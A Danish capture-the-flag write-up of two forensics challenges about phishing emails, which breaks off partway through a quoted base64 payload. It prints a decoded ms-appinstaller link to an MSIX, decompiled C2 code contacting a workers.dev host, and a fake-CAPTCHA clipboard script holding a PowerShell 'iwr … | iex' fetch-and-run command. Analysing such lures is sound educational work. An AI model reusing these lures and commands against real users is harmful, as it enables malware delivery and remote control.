Scoreboard:
Link til mine løste opgaver inklusiv tidspunkt
Youve got mail 2! (Forensics)
Dammit!… I did it again… But this time it seemed sooooo convincing? Like what even happened?…
Disclaimer: The handout file may be flagged as malware by antivirus software. It is recommended to run it in a sandbox or isolated environment.
Vedhæftet fil: forensics_youvegotmailtwo.zip
Løsning: Efter at have unzipppet zip filen, får vi en .eml fil. Det er en email, og i emailen er et meget suspekt stykke javascript kode.
Klik for at udvide den rå payload (langt output)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
|
<script type=3D"application/ld+json" id=3D"ActionableMessageCardScript"> {
"@type": "SignedAdaptiveCard",
"@context": "http://schema.org/extensions",
"signedAdaptiveCard": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6Ik1JSU=
pTekNDQnpPZ0F3SUJBZ0lUVlFBRE5RWVJReDljd1lLVW5RQUFBQU0xQmpBTkJna3Foa2lHOXcwQ=
kFRd0ZBREJYTVFzd0NRWURWUVFHRXdKVlV6RWVNQndHQTFVRUNoTVZUV2xqY205emIyWjBJRU52=
Y25CdmNtRjBhVzl1TVNnd0pnWURWUVFERXg5TmFXTnliM052Wm5RZ1ZFeFRJRWN5SUZKVFFTQkR=
RU0JQUTFOUUlERTJNQjRYRFRJMk1ERXlNREl3TkRNeE5sb1hEVEkyTURjeE9USXdORE14Tmxvd2=
VERUxNQWtHQTFVRUJoTUNWVk14Q3pBSkJnTlZCQWdUQWxkQk1SQXdEZ1lEVlFRSEV3ZFNaV1J0Y=
jI1a01SNHdIQVlEVlFRS0V4Vk5hV055YjNOdlpuUWdRMjl5Y0c5eVlYUnBiMjR4S2pBb0JnTlZC=
QU1USVdWdmNHMWhhV3d1YjJSemNHNXZkR2xtZVM1emFHRnlaWEJ2YVc1MExtTnZiVENDQVNJd0R=
RWUpLb1pJaHZjTkFRRUJCUUFEZ2dFUEFEQ0NBUW9DZ2dFQkFLb2VTTStVL1hIS1hXY2ZVU2xxOT=
lNcTVoUlhRb2toNlBKei9LS293b3ErQjM0Rk9EQ0VkZGhuZ0pteGhzRGVaNFhLMUt5ZWc3Vjk4K=
1FMOXdJKytEdDM1dEF0QUY4NFFHbHZKbm93NzBXUFc0U3lTTmVqUU9GZUE4bDE5YkFYS2JLNnRL=
S1dLQTk4T2JlUW9VQUJaNklxMjhEWTlkWGlldFU1b2k3SXlPZEhuRDdNTmp1TUVzVUx6NmFTQzV=
yajd2TEZpNWhXdHFXTTcyd0llL25DdTNJRDE2NytmekJOTEpGbE1oOHV5bTBnRHc4VHBPUE42UH=
ZZaHRPTFE4NXZ0WFduZUlocDlwQjhuRHBJQUZSTXhDZUlGcGVZb3Jqc1kyWVRSOWMrQXR3by9DW=
FZWbVZzN2RrWG42c1EvdFhCRm9XT215Zit4ZjVuRW9zS1lKcC93dkVDQXdFQUFhT0NCTzB3Z2dU=
cE1JSUJmZ1lLS3dZQkJBSFdlUUlFQWdTQ0FXNEVnZ0ZxQVdnQWRnRFlDVlU3bEU5Ni84Z1dHVyt=
VVDRXcnNQajhYb2RWSmc4VjBTNXl1MFZMRkFBQUFadmRMdnBXQUFBRUF3QkhNRVVDSVFEYktvOG=
dsV0lHdlBkeGJPSlhBeTN2UmpkYm9oZ1d2K3pHZTRveHZ1dHFUUUlnZW8zTVNjcEFEK0JoUEVNM=
3FNblVwTGc4Qzlpb3ExTnZhTTlDQ2pqdUx3RUFkUURDTVg1WFJSbWpSZTUvT042eWtFSHJ4OElo=
V2lLL2Y5VzFyWGFhMlE1U3pRQUFBWnZkTHZzV0FBQUVBd0JHTUVRQ0lFTERJZWd1bThjOW5hUUl=
4alpRbkhlSHlGazliWDFPQnNWZFh2c283QVhwQWlCdjNCSlh1R2lIYk04dzNSVkF2SU95YkRtRX=
hDT0JnbkdraFhIZFpSZnRwUUIzQU1panhIL0hzNjI1TldzQlAycDZFbTNqT2s1RHBjWkcrWmV0T=
1hXWkhjK2FBQUFCbTkwdSt5QUFBQVFEQUVnd1JnSWhBTks1ekRqdTJrd3NGaXJCb1AvODAwcjBU=
cnNkdGFLQlc3M2VHUXhQcWdPcUFpRUFxOHBSM0pHNnJYTDhMdGluamNpSHJuekxDUy9jMGhDQXp=
3YUpnWC8yTGpVd0d3WUpLd1lCQkFHQ054VUtCQTR3RERBS0JnZ3JCZ0VGQlFjREFUQThCZ2tyQm=
dFRUFZSTNGUWNFTHpBdEJpVXJCZ0VFQVlJM0ZRaUh2ZGNiZ2VmclJvS0JuUzZPMEF5SDhOb2RYW=
VBwdzJlQ3RLTk1BZ0ZrQWdFZ01JSUJDd1lJS3dZQkJRVUhBUUVFZ2Y0d2dmc3dZUVlJS3dZQkJR=
VUhNQUtHVldoMGRIQTZMeTkzZDNjdWJXbGpjbTl6YjJaMExtTnZiUzl3YTJsdmNITXZZMlZ5ZEh=
NdlRXbGpjbTl6YjJaMEpUSXdWRXhUSlRJd1J6SWxNakJTVTBFbE1qQkRRU1V5TUU5RFUxQWxNak=
F4Tmk1amNuUXdad1lJS3dZQkJRVUhNQUtHVzJoMGRIQTZMeTlqWVdsemMzVmxjbk11YldsamNtO=
XpiMlowTG1OdmJTOXdhMmx2Y0hNdlkyVnlkSE12VFdsamNtOXpiMlowSlRJd1ZFeFRKVEl3UnpJ=
bE1qQlNVMEVsTWpCRFFTVXlNRTlEVTFBbE1qQXhOaTVqY25Rd0xRWUlLd1lCQlFVSE1BR0dJV2g=
wZEhBNkx5OXZibVZ2WTNOd0xtMXBZM0p2YzI5bWRDNWpiMjB2YjJOemNEQWRCZ05WSFE0RUZnUV=
VNWmoxOTlHT1pXZWdpN3RRbG5NWnA5UHdaWGt3RGdZRFZSMFBBUUgvQkFRREFnV2dNQ3dHQTFVZ=
EVRUWxNQ09DSVdWdmNHMWhhV3d1YjJSemNHNXZkR2xtZVM1emFHRnlaWEJ2YVc1MExtTnZiVEFN=
QmdOVkhSTUJBZjhFQWpBQU1JSHhCZ05WSFI4RWdla3dnZVl3Z2VPZ2dlQ2dnZDJHYkdoMGRIQTZ=
MeTkzZDNjdWJXbGpjbTl6YjJaMExtTnZiUzl3YTJsdmNITXZZM0pzTDNCaGNuUnBkR2x2Ymk5Tm=
FXTnliM052Wm5RbE1qQlVURk1sTWpCSE1pVXlNRkpUUVNVeU1FTkJKVEl3VDBOVFVDVXlNREUyW=
DFCaGNuUnBkR2x2YmpBd01EWTRMbU55YkladGFIUjBjRG92TDJOeWJESXViV2xqY205emIyWjBM=
bU52YlM5d2EybHZjSE12WTNKc0wzQmhjblJwZEdsdmJpOU5hV055YjNOdlpuUWxNakJVVEZNbE1=
qQkhNaVV5TUZKVFFTVXlNRU5CSlRJd1QwTlRVQ1V5TURFMlgxQmhjblJwZEdsdmJqQXdNRFk0TG=
1OeWJEQm1CZ05WSFNBRVh6QmRNQWdHQm1lQkRBRUNBakJSQmd3ckJnRUVBWUkzVElOOUFRRXdRV=
EEvQmdnckJnRUZCUWNDQVJZemFIUjBjRG92TDNkM2R5NXRhV055YjNOdlpuUXVZMjl0TDNCcmFX=
OXdjeTlFYjJOekwxSmxjRzl6YVhSdmNua3VhSFJ0TUI4R0ExVWRJd1FZTUJhQUZBWTU4RmJSN1p=
ESU5xT2dENVQrWXBTbjV2dzNNQk1HQTFVZEpRUU1NQW9HQ0NzR0FRVUZCd01CTUEwR0NTcUdTSW=
IzRFFFQkRBVUFBNElDQVFCZmE5TW1DeUI4bGlzeGpFR0ZQRWRsZDU1ci9ZTWJITEFlbFo5akFRL=
0laeFB6MFRxaTRjMU5QKy8wOTE1d05GSk1rS1l2OGFlc1JpTmFUNHZ5MFQ1VGVSQWo4anFqbm1i=
OU9sSlF2R3lJTGQzUWhTZHEzSXhqeTdaRFdTOGkxb3JYOTJOeXVwbFJ4QjZvQkRmZG42NlRhTFo=
yQ3pubmxPTTdDSFN0MFgxUGFrc2J2U2dYTFN0czE0UjN6VGVudmVUenF4czFZRUVLdVhITDFNcD=
NpemdraUxwdTNvMVEwTDNOMjgwbVpvbkdnMXJ1TW5GZ2svaFFqakZEY0d1UWNDbVZHdEl3KzZPT=
2FlMGoxcDBZeE5xS0RXbEE3SUpYTHRKUDdQbVdNQ2FsTlJhYXVSZ2tqMGNnRWQ0WVhrYzdEWEhm=
OEhpMStydFdVWjA1MjF3dFo2QXZ0ZWY3dGhoZ0t2MXErcW1ud0FqS0hpMC9SckhpZktGUVRXeHV=
oQTBtZk5YWGh1cStBSGdoRGhxQm43LzJ1QWlnQXVXeUFOcU85RnZDNkp3VXFKZkcxSnA0V1gzb3=
FhTFU2S3RKc2NuaHQxcDVoV1NHWmdqbk9EdDRNOFl3aUNydk5PWFVWUnVCNnFBc0YyY2YxZmNoO=
XZSV3lJOHZIWnFFRmVCc3NNWEowbEZSdVYxeHVFNkduR0tUQkVmdXNTMmhFZzlydzBjU2NRV0Vx=
SGFibXRKZ3dPT1dFMDkrUVdyeUJ6QW95ZERGUlVXN1N4QXJSaVF3T1JvMmFnWU85cjVsNEJWdkd=
UZ0FvNzN1TWNnd202dzlUWW1kTlgvbEZHcXROUG9jWnJnN0MyWVlwN1JqMUxlV0FIOU5pVEZhOW=
VkM1NTa0ZvZVpHY3pmOEw3S3RtVjVYalE9PSJ9eyJzZW5kZXIiOiJqZW5zLm15cnVwQGNhcm5wZ=
mlyZS5kZGMiLCJvcmlnaW5hdG9yIjoiYWJkMTdiNGItZTM2My00OTdhLTkwZGMtYTFhNjNiM2I5=
NWM1IiwiYWRhcHRpdmVDYXJkU2VyaWFsaXplZCI6IntcbiAgICAiJHNjaGVtYSI6ICJodHRwOi8=
vYWRhcHRpdmVjYXJkcy5pby9zY2hlbWFzL2FkYXB0aXZlLWNhcmQuanNvbiIsXG4gICAgInR5cG=
UiOiAiQWRhcHRpdmVDYXJkIixcbiAgICAidmVyc2lvbiI6ICIxLjAiLFxuICAgICJib2R5IjogW=
1xuICAgICAgICB7XG4gICAgICAgICAgICAidHlwZSI6ICJDb2x1bW5TZXQiLFxuICAgICAgICAg=
ICAgImlkIjogIjFlZGUyYWJhLTYxYjktZmFhMC05ODk1LTllZDBjMjZiMmU2ZiIsXG4gICAgICA=
gICAgICAiY29sdW1ucyI6IFtcbiAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgIC=
AgICJ0eXBlIjogIkNvbHVtbiIsXG4gICAgICAgICAgICAgICAgICAgICJpZCI6ICJlNTc1NjI0M=
i0wOTYzLTM3YTItN2NiNC00Mzk3ODg2ZDYwYmIiLFxuICAgICAgICAgICAgICAgICAgICAicGFk=
ZGluZyI6ICJOb25lIixcbiAgICAgICAgICAgICAgICAgICAgIndpZHRoIjogInN0cmV0Y2giLFx=
uICAgICAgICAgICAgICAgICAgICAiaXRlbXMiOiBbXG4gICAgICAgICAgICAgICAgICAgICAgIC=
B7XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcbiAgI=
CAgICAgICAgICAgICAgICAgICAgICAgICAiaWQiOiAiMjBmMzgzM2UtMDQzNS01Yzg3LWZhZDEt=
YjUyOGUwMDQ2ZmI2IixcbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGV4dCI6ICJNaWN=
yb3NvZnQgU2VjdXJlIEVtYWlscyIsXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgIndyYX=
AiOiB0cnVlXG4gICAgICAgICAgICAgICAgICAgICAgICB9XG4gICAgICAgICAgICAgICAgICAgI=
F0sXG4gICAgICAgICAgICAgICAgICAgICJ2ZXJ0aWNhbENvbnRlbnRBbGlnbm1lbnQiOiAiQ2Vu=
dGVyIlxuICAgICAgICAgICAgICAgIH0sXG4gICAgICAgICAgICAgICAge1xuICAgICAgICAgICA=
gICAgICAgICAidHlwZSI6ICJDb2x1bW4iLFxuICAgICAgICAgICAgICAgICAgICAiaWQiOiAiNz=
QyMTVhMjYtZmE4Yi1lNTQ5LWNjZWQtN2Y5OWZkMzRhNjYxIixcbiAgICAgICAgICAgICAgICAgI=
CAgInBhZGRpbmciOiAiTm9uZSIsXG4gICAgICAgICAgICAgICAgICAgICJ3aWR0aCI6ICJhdXRv=
IixcbiAgICAgICAgICAgICAgICAgICAgIml0ZW1zIjogW10sXG4gICAgICAgICAgICAgICAgICA=
gICJob3Jpem9udGFsQWxpZ25tZW50IjogIlJpZ2h0IlxuICAgICAgICAgICAgICAgIH1cbiAgIC=
AgICAgICAgIF0sXG4gICAgICAgICAgICAicGFkZGluZyI6IHtcbiAgICAgICAgICAgICAgICAid=
G9wIjogIlNtYWxsIixcbiAgICAgICAgICAgICAgICAiYm90dG9tIjogIlNtYWxsIixcbiAgICAg=
ICAgICAgICAgICAibGVmdCI6ICJEZWZhdWx0IixcbiAgICAgICAgICAgICAgICAicmlnaHQiOiA=
iU21hbGwiXG4gICAgICAgICAgICB9LFxuICAgICAgICAgICAgInN0eWxlIjogImVtcGhhc2lzIl=
xuICAgICAgICB9LFxuICAgICAgICB7XG4gICAgICAgICAgICAidHlwZSI6ICJDb250YWluZXIiL=
FxuICAgICAgICAgICAgImlkIjogInBhZ2UyIixcbiAgICAgICAgICAgICJwYWRkaW5nIjogIkRl=
ZmF1bHQiLFxuICAgICAgICAgICAgIml0ZW1zIjogW1xuICAgICAgICAgICAgICAgIHtcbiAgICA=
gICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcbiAgICAgICAgICAgICAgICAgIC=
AgImlkIjogImMzMTk4ODU2LWU3NWItNDIxMy04YjAyLWY0Mzk2MzcxNTBjZCIsXG4gICAgICAgI=
CAgICAgICAgICAgICJ0ZXh0IjogIkVycm9yISIsXG4gICAgICAgICAgICAgICAgICAgICJ3cmFw=
IjogdHJ1ZSxcbiAgICAgICAgICAgICAgICAgICAgInNpemUiOiAiTGFyZ2UiLFxuICAgICAgICA=
gICAgICAgICAgICAid2VpZ2h0IjogIkJvbGRlciJcbiAgICAgICAgICAgICAgICB9LFxuICAgIC=
AgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcb=
iAgICAgICAgICAgICAgICAgICAgImlkIjogIjFhOWFhZmVjLTQwMmItNzlmYi0zNDBjLWNjY2I3=
MTU0MjMzNSIsXG4gICAgICAgICAgICAgICAgICAgICJ0ZXh0IjogIllvdXIgbWFjaGluZSBkb2V=
zIG5vdCBzdXBwb3J0IHRoZSByZXF1aXJlZCBmZWF0dXJlcyBmb3Igb3BlbmluZyBhbiBlbmNyeX=
B0ZWQgZW1haWwuIFBsZWFzZSBlbmFibGUgdGhlIGZlYXR1cmUgdG8gdmlldyB0aGUgbWVzc2FnZ=
SIsXG4gICAgICAgICAgICAgICAgICAgICJ3cmFwIjogdHJ1ZVxuICAgICAgICAgICAgICAgIH0s=
XG4gICAgICAgICAgICAgICAge1xuICAgICAgICAgICAgICAgICAgICAidHlwZSI6ICJBY3Rpb25=
TZXQiLFxuICAgICAgICAgICAgICAgICAgICAiaWQiOiAiYjc0Y2Q2ZTgtNjMzOC1lMzZjLWZhNG=
EtNzNmZTBhMzA5MGRmIixcbiAgICAgICAgICAgICAgICAgICAgImFjdGlvbnMiOiBbXG4gICAgI=
CAgICAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgInR5cGUi=
OiAiQWN0aW9uLk9wZW5VcmwiLFxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpZCI6ICI=
zNWUwNGQzYy1jOGZlLWNhYWItOWRiOC1jYWE1NGIwMDgzZmEiLFxuICAgICAgICAgICAgICAgIC=
AgICAgICAgICAgICJ0aXRsZSI6ICJFbmFibGUgRmVhdHVyZSIsXG4gICAgICAgICAgICAgICAgI=
CAgICAgICAgICAgInVybCI6ICJtcy1hcHBpbnN0YWxsZXI6P3NvdXJjZT1odHRwczovL3NlY3Vy=
ZWVtYWlsLmN0ZnRlY2gudWsvaW5zdGFsbGVyLm1zaXgiLFxuICAgICAgICAgICAgICAgICAgICA=
gICAgICAgICJzdHlsZSI6ICJwb3NpdGl2ZSIsXG4gICAgICAgICAgICAgICAgICAgICAgICAgIC=
AgImlzUHJpbWFyeSI6IHRydWVcbiAgICAgICAgICAgICAgICAgICAgICAgIH1cbiAgICAgICAgI=
CAgICAgICAgICAgXSxcbiAgICAgICAgICAgICAgICAgICAgImhvcml6b250YWxBbGlnbm1lbnQi=
OiAiUmlnaHQiXG4gICAgICAgICAgICAgICAgfVxuICAgICAgICAgICAgXSxcbiAgICAgICAgICA=
gICJpc1Zpc2libGUiOiBmYWxzZVxuICAgICAgICB9LFxuICAgICAgICB7XG4gICAgICAgICAgIC=
AidHlwZSI6ICJDb250YWluZXIiLFxuICAgICAgICAgICAgImlkIjogInBhZ2UxIixcbiAgICAgI=
CAgICAgICJwYWRkaW5nIjogIkRlZmF1bHQiLFxuICAgICAgICAgICAgInNwYWNpbmciOiAiTm9u=
ZSIsXG4gICAgICAgICAgICAiaXRlbXMiOiBbXG4gICAgICAgICAgICAgICAge1xuICAgICAgICA=
gICAgICAgICAgICAidHlwZSI6ICJUZXh0QmxvY2siLFxuICAgICAgICAgICAgICAgICAgICAiaW=
QiOiAiNDQ5MDY3OTctMjIyZi05ZmUyLTBiN2EtZTNlZTIxYzZlMzgwIixcbiAgICAgICAgICAgI=
CAgICAgICAgInRleHQiOiAiWW91IGhhdmUgYSBuZXcgZW5jcnlwdGVkIGVtYWlsIixcbiAgICAg=
ICAgICAgICAgICAgICAgIndyYXAiOiB0cnVlLFxuICAgICAgICAgICAgICAgICAgICAid2VpZ2h=
0IjogIkJvbGRlciIsXG4gICAgICAgICAgICAgICAgICAgICJzaXplIjogIkxhcmdlIixcbiAgIC=
AgICAgICAgICAgICAgICAgInN0eWxlIjogImhlYWRpbmciXG4gICAgICAgICAgICAgICAgfSxcb=
iAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgICAgICJ0eXBlIjogIlRleHRCbG9j=
ayIsXG4gICAgICAgICAgICAgICAgICAgICJpZCI6ICJmN2FiZGYxYS0zY2NlLTIxNTktMjhlZi1=
mMmYzNjJlYzkzN2UiLFxuICAgICAgICAgICAgICAgICAgICAidGV4dCI6ICJZb3UgaGF2ZSByZW=
NpZXZlZCBhbiBlbmNyeXB0ZWQgZW1haWwgZnJvbSBcXCJqZW5zLm15cnVwQGN5YmVybWVzdGVyc=
2thYmVybmUuZGRjXFwiIHdpdGggdGhlIHN1YmplY3QgXFwiQ3JlZGVudGlhbHMgZm9yIENURmRc=
XCIiLFxuICAgICAgICAgICAgICAgICAgICAid3JhcCI6IHRydWVcbiAgICAgICAgICAgICAgICB=
9LFxuICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiQWN0aW=
9uU2V0IixcbiAgICAgICAgICAgICAgICAgICAgImlkIjogImE0YjdmNmZhLWYwOWMtMzI0MC0wM=
TA3LWJhOTZkYTUwNDcxYyIsXG4gICAgICAgICAgICAgICAgICAgICJhY3Rpb25zIjogW1xuICAg=
ICAgICAgICAgICAgICAgICAgICAge1xuICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0eXB=
lIjogIkFjdGlvbi5Ub2dnbGVWaXNpYmlsaXR5IixcbiAgICAgICAgICAgICAgICAgICAgICAgIC=
AgICAiaWQiOiAiZDg2OTA1NmMtZTQzNi0xOGYxLTE5MzgtYTAzN2RhNmRiOGM4IixcbiAgICAgI=
CAgICAgICAgICAgICAgICAgICAgICAidGl0bGUiOiAiVmlldyBtZXNzYWdlIixcbiAgICAgICAg=
ICAgICAgICAgICAgICAgICAgICAidGFyZ2V0RWxlbWVudHMiOiBbXG4gICAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC=
JlbGVtZW50SWQiOiAicGFnZTEiLFxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI=
CAgImlzVmlzaWJsZSI6IGZhbHNlXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0s=
XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAgICJlbGVtZW50SWQiOiAicGFnZTIiLFxuICAgICAgICAgICAgICAgIC=
AgICAgICAgICAgICAgICAgICAgImlzVmlzaWJsZSI6IHRydWVcbiAgICAgICAgICAgICAgICAgI=
CAgICAgICAgICAgICAgfVxuICAgICAgICAgICAgICAgICAgICAgICAgICAgIF0sXG4gICAgICAg=
ICAgICAgICAgICAgICAgICAgICAgInN0eWxlIjogInBvc2l0aXZlIixcbiAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAiaXNQcmltYXJ5IjogdHJ1ZVxuICAgICAgICAgICAgICAgICAgICAgIC=
AgfVxuICAgICAgICAgICAgICAgICAgICBdLFxuICAgICAgICAgICAgICAgICAgICAiaG9yaXpvb=
nRhbEFsaWdubWVudCI6ICJSaWdodCJcbiAgICAgICAgICAgICAgICB9XG4gICAgICAgICAgICBd=
XG4gICAgICAgIH1cbiAgICBdLFxuICAgICJwYWRkaW5nIjogIk5vbmUiLFxuICAgICJAdHlwZSI=
6ICJBZGFwdGl2ZUNhcmQiLFxuICAgICJAY29udGV4dCI6ICJodHRwOi8vc2NoZW1hLm9yZy9leH=
RlbnNpb25zIixcblx0ZXhwZWN0ZWRBY3RvcnM6IFtcbiAgXHQgIG51bGxcblx0XSxcblx0aGlkZ=
U9yaWdpbmFsQm9keTogdHJ1ZSxcblx0cnRsOiBmYWxzZVxufSIsImlhdCI6IjE3NzE0MjcwODgi=
LCJyZWNpcGllbnRzU2VyaWFsaXplZCI6IltcIm9mZmVyLnNvZXJlbnNlbkBob3RtYWlsLmRkY1w=
iXSJ9"
} </script>
|
Hvis vi fjerner alle ligemed tegn og alle newlines, og så base64 decoder det, får vi en masse json data samt indholdet af en JWT token. Det vigtige her er en meget spisifik del af det AdaptiveCard vi finder, nemlig:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
{
"type": "ActionSet",
"id": "b74cd6e8-6338-e36c-fa4a-73fe0a3090df",
"actions": [
{
"type": "Action.OpenUrl",
"id": "35e04d3c-c8fe-caab-9db8-caa54b0083fa",
"title": "Enable Feature",
"url": "ms-appinstaller:?source=https://secureemail.ctftech.uk/installer.msix",
"style": "positive",
"isPrimary": true
}
],
"horizontalAlignment": "Right"
}
|
Blandt alt det her finder vi en url: "url": "ms-appinstaller:?source=https://secureemail.ctftech.uk/installer.msix", som peger på en msix fil. Dette er en Microsoft Installer fil, som kan installeres på Windows 10 og 11. Hvis man downloader denne fil, kan den faktisk åbnes som et hvilket som helst zip arkiv, og inde i den finder vi 3 xml filer og en main.exe fil. installer.msix (mirror)
Efter at have kigget i main.exe filen ved hjælp af Binary Ninja, finder vi en funktion som laver network requests til long-recipe-da01.oluf-sand.workers.dev og sender data til /api/args og modtager data fra /api/result. Dette ligner klassisk c2 kommunikation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
int16_t* sub_402270()
{
int32_t var_8 = 0xffffffff;
int32_t (* var_c)(void* arg1) = sub_41af06;
TEB* fsbase;
struct _EXCEPTION_REGISTRATION_RECORD* ExceptionList = fsbase->NtTib.ExceptionList;
int32_t __saved_ebp;
int32_t eax_2 = __security_cookie ^ &__saved_ebp;
int32_t var_184 = eax_2;
fsbase->NtTib.ExceptionList = &ExceptionList;
void var_44;
sub_404850(&var_44, u"long-recipe-da01.oluf-sand.workers.dev");
int32_t var_8_1 = 0;
int16_t var_150 = 0x1bb;
void var_74;
sub_404850(&var_74, u"/api/args");
var_8_1 = 1;
void var_5c;
sub_404850(&var_5c, u"/api/result");
var_8_1 = 2;
void var_2c;
sub_404650(&var_2c);
var_8_1 = 3;
int16_t* result;
if (sub_401980(&var_44, 0x1bb, &var_74, &var_2c))
{
int32_t var_14c;
sub_404920(&var_14c);
var_8_1 = 4;
if (sub_401470(&var_2c, &var_14c))
{
void var_a4;
sub_404650(&var_a4);
var_8_1 = 5;
uint32_t var_140 = 0;
if (sub_401e80(&var_14c, &var_a4, &var_140))
{
void var_134;
int32_t* eax_10 = sub_407010(&var_134, var_140);
var_8_1 = 6;
var_8_1 = 7;
var_8_1 = 8;
var_8_1 = 9;
var_8_1 = 0xa;
void var_11c;
void var_104;
void var_ec;
void var_d4;
void var_bc;
sub_402970(&var_bc,
sub_402930(&var_d4,
sub_402970(&var_ec,
sub_4029b0(&var_104, "{"output":"", sub_401630(&var_11c, &var_a4)),
"","exit_code":"),
eax_10),
"}");
...
|
Hvis vi bruger curl til at sende en request til long-recipe-da01.oluf-sand.workers.dev/api/args får vi powershell commands, men en note er at svaret skifter hver gang:
Flag: DDC{pl34s3_t3ll_m3_y0u_r4n_th1s_1n_4_s4ndb0x}
Youve got mail! (Forensics)
I um… might have clicked something I shouldn’t have… I swear I didn’t mean to! I just wanted to see if it was really the flags being shared - to let Jens know I mean! Anyway, can you help me out?
Disclaimer: The handout file may be flagged as malware by antivirus software. It is recommended to run it in a sandbox or isolated environment.
Vedhæftet fil: forensics_youvegotmail.zip
Løsning: Dette er igen en suspekt udseende mail, som indeholder en html fil kaldet SecureMessage.html. I denne html fil finder vi noget der minder rigtig meget om falske CAPTCHAs som gemmer på malware.
1
2
3
4
5
6
7
8
|
document.onkeydown = () => {
const type = "text/plain";
const clipboardItemData = {
[type]: 'powershell.exe -ExecutionPolicy Bypass -c "iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev|iex";# Enable-Feature -Name EncryptedEmails ',
};
const clipboardItem = new ClipboardItem(clipboardItemData);
navigator.clipboard.write([clipboardItem]);
}
|
Hvis personen som åbner denne mail og kopire teksten og kører den i windows run dialogen, så vil det køre en powershell kommando som henter og kører kode fra jolly-heart-a4be.oluf-sand.workers.dev.
Hvis vi sender en request til jolly-heart-a4be.oluf-sand.workers.dev får vi følgende respons tilbage:
1
|
echo "">C:/Windows/Temp/ndr8C2E.tmp
|
Min første tanke er at vi skal have nogle headers som gør at serveren tror det er en request fra powershell, så jeg prøver at sende følgende request:
1
|
curl -A "Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737" http://jolly-heart-a4be.oluf-sand.workers.dev
|
Aha! Nu får vi følgende respons:
1
2
3
4
5
6
7
8
|
echo "">C:/Windows/Temp/ndr8C2E.tmp
$dat="H4sIAA7ZlmkA/41VW5PaOBN951e4XFRh48i2fAOTmgcyYTLZL0yogdmtfGQehC0YT4xNyXImZHf/e1qSL0xVHpYqLm6koz7ndLeGJC+fD+RqVGUPo8Gw/lnnNPl2pQ+NbXI7Z4/G9t0XTh/dH6FvWtvrJnTmCwhNYhW6h9Duy0asmqhVBEIYR+PYd2IRASi56LwR+6JQLHoiF+hRapr20DBGS1KMrBE5UPg80oKPTPuuZMt5nv2kMiWFI88Poj6lFnqvoMX5bmRN5ZPYE7pWqNIVx0ZTKwpQFJimhhg95SShGoDLjBrwMJF5ixDGnuKguCuiu45oK0eQdulg7FqBiwJXnS8iXjj2YseLJc8WrCWCBb7MsxVkIjVSdN812gZdCGNsRR6KVF4yRzce+7HjC46J5B9PLB9JOySwtCN0YoHbMlW4kdSlWYTHoeuEIm9AUUzG8dSJp40/8+PIamrGGvEsr8CgomRHAgYtgJckKzLuDGqpNodJg5Ruuy+qjHoW04nlNU+wIIJDL/xp1VAGSH86gRSQTFsVn+eP/cDxG8kAejLplBEQslhoL58Xmqb+dnioz0/Zld7VEJZyKVKQrrRBJtiIE1pQHKgpkAa8cesiGRePvcDxZDJykQel2fSTcAqsw44vikCVJ7gLTnRNItz2YgS101unRIhUB4hQAFv6vsLuxMIBwuJIZcB0amHZim2WF2QayVyAmAAZoVTTnm1bk16GxltVe00Tn1UTq5Zpqw27oQPv3k4Lu6Ihm+OwB88ugjcIv908MUrSrDjY6tfjbLbOKT0ZOAQl3w6yvTGkxffZw3pxfzdfLjRUUG30TItqpKGSafLP68/L1cPmcsHxzOrTkSRPWUFH5t+M8poV/w6G64RlJz77WFSc5Pl9WXJNvq60P8qsQCvCnxTkipUHRo7vCSeafl0WvKzK91CR5VlMJ71D+lQe5Kbu9QrpN8fpeXmo+v1rTji9yXL6n/fDT07t56osepR7esgqzs4doStNv/3fp+Xs6/rzzeav+f3ia8Ph6yonfA+N229e/KBJzbOy+Ji2KWwPdSasuKMvH+CXYdqbcs0Z2GSYl6kzvsmOF6l/oByBZHQwXDBWsnkiYFeM7imjBfQypLXm5UkfiOVDDnuBzfEEcaPdenGUfoYXWi5Rmmq3t7PjcVZV9n6/1021X9AgnNNU4G57uEdt+/Hu5jN8DY3fkDQfteuyzlOtALEyJS2osSjILpdYQ85qOtje0/2jPa8qetzlZxvy25xP1GivStPWIbTPFnmqG3Kyq+E7xpGDmwtKzoDYCkMUqnZob7Huynx918qJ3M8qEQrUkH7VbmJ8vb6C1